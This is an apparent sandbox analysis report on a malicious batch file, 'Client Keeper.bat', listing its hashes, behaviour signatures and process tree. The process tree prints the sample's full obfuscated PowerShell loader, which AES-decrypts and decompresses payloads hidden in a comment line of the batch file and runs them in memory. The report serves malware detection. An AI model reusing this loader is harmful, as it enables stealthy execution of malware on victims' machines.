Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/09/2024, 12:57
Static task
static1
Behavioral task
behavioral1
Sample
Client Keeper.bat
Resource
win7-20240903-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Client Keeper.bat
Resource
win10v2004-20240802-en
16 signatures
150 seconds
General
-
Target
Client Keeper.bat
-
Size
442KB
-
MD5
ccf46201786b2facd7b19ea6129944da
-
SHA1
25e51f0e98977de48e111773058cc1b70ced0892
-
SHA256
74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6
-
SHA512
43a92ed1caf5a517e4e1506127b96b07c75458701e4d0b0556fc79694866fb27089ed919688c7ff68c7c2a87b51ef2e635d85bfa8a5aa860f132bfb1fbe13675
-
SSDEEP
6144:7iCje5mpo5kEu3ojrKYMwoocilcJohGUMJb0YXZyDC3ntd0FqT/G+PYDKhJaltT7:Xi5mpJEu3mkR4LMxZye3ntqFKFPTjWZ
Score
6/10
Malware Config
Signatures
-
pid Process 2672 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2280 wrote to memory of 2672 2280 cmd.exe 32 PID 2280 wrote to memory of 2672 2280 cmd.exe 32 PID 2280 wrote to memory of 2672 2280 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client Keeper.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o1j2aeFxATS/LMnhyTtPZh88JKeZO7a/GlRllyMvGKg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkQnfLRJOt+ggCAP/xzZGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QmUAh=New-Object System.IO.MemoryStream(,$param_var); $PKXDP=New-Object System.IO.MemoryStream; $nocnw=New-Object System.IO.Compression.GZipStream($QmUAh, [IO.Compression.CompressionMode]::Decompress); $nocnw.CopyTo($PKXDP); $nocnw.Dispose(); $QmUAh.Dispose(); $PKXDP.Dispose(); $PKXDP.ToArray();}function execute_function($param_var,$param2_var){ $RADPl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkeSZ=$RADPl.EntryPoint; $qkeSZ.Invoke($null, $param2_var);}$JTvsg = 'C:\Users\Admin\AppData\Local\Temp\Client Keeper.bat';$host.UI.RawUI.WindowTitle = $JTvsg;$zlCYh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JTvsg).Split([Environment]::NewLine);foreach ($GJRIG in $zlCYh) { if ($GJRIG.StartsWith(':: ')) { $PnLCB=$GJRIG.Substring(3); break; }}$payloads_var=[string[]]$PnLCB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-